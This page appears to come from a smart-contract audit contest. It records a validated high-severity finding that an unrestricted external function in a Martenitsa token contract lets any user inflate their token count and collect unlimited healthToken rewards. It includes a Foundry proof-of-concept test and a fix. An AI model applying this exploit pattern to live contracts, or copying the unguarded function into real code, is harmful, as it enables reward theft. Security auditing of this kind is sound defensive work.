First Flight #13: Baba Marta

First Flight #13

Beginner FriendlyFoundryGameFi

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

The `MartenitsaMarketplace::collectReward` function allows malacious users to collect unlimited healthToken.

badal_sharma09

Description: The MartenitsaMarketplace contract provides a marketplace where users can buy and sell martenitsa tokens, with additional functionality for making presents, collecting rewards and managing listings. All users can participate in buying and collecting rewards, but only producers can list their tokens for sale and then sell them. however, the MartenitsaToken contract allows the malicious user to call the MartenitsaToken::updateCountMartenitsaTokensOwner without any restrictions because of this malicious attackers or users collect unlimited healthToken from the MartenitsaMarketplace::collectReward contract.

Impact: Malicious users collect unlimited healthToken.

Proof Of Concept: Paste this test to your test folder and run the test.

function test_usersGetFreeHealthToken() public {

vm.startPrank(chasy);

// chasy create three Martenstsa tokens

martenitsaToken.createMartenitsa("bracelet");

marketplace.listMartenitsaForSale(0, 1 wei);

marketplace.listMartenitsaForSale(1, 1 wei);

marketplace.listMartenitsaForSale(2, 1 wei);

martenitsaToken.approve(address(marketplace), 0);

martenitsaToken.approve(address(marketplace), 1);

martenitsaToken.approve(address(marketplace), 2);

// chasy present the Martenstsa tokens to bob

marketplace.makePresent(bob, 0);

marketplace.makePresent(bob, 1);

marketplace.makePresent(bob, 2);

vm.stopPrank();

// bob user call the updateCountMartenitsaTokensOwner

//Because of this bob get 3 healthToken insted of 1 healthToken

vm.startPrank(bob);

martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");

vm.stopPrank();

// In countMartenitsaTokensOwner mapping, the user is updating the count of martenitsaTokens

console.log(" get the count of martenitsaTokens:", martenitsaToken.getCountMartenitsaTokensOwner(bob));

// bob collect the reward

vm.startPrank(bob);

marketplace.collectReward();

vm.stopPrank();

console.log("balance of healToken:", healthToken.balanceOf(bob));

console.log("balance of martenitsaToken:", martenitsaToken.balanceOf(bob));

}

Recommendation: The MartenitsaToken::updateCountMartenitsaTokensOwner function is an external function that's why users update the count of martenitsa tokens owned by a specific address without any restrictions so make sure it should be internal instead of an external function.

Updates

Lead Judging Commences

bube Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

Missing access control

Rewards breakdown

nSLOC

239

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.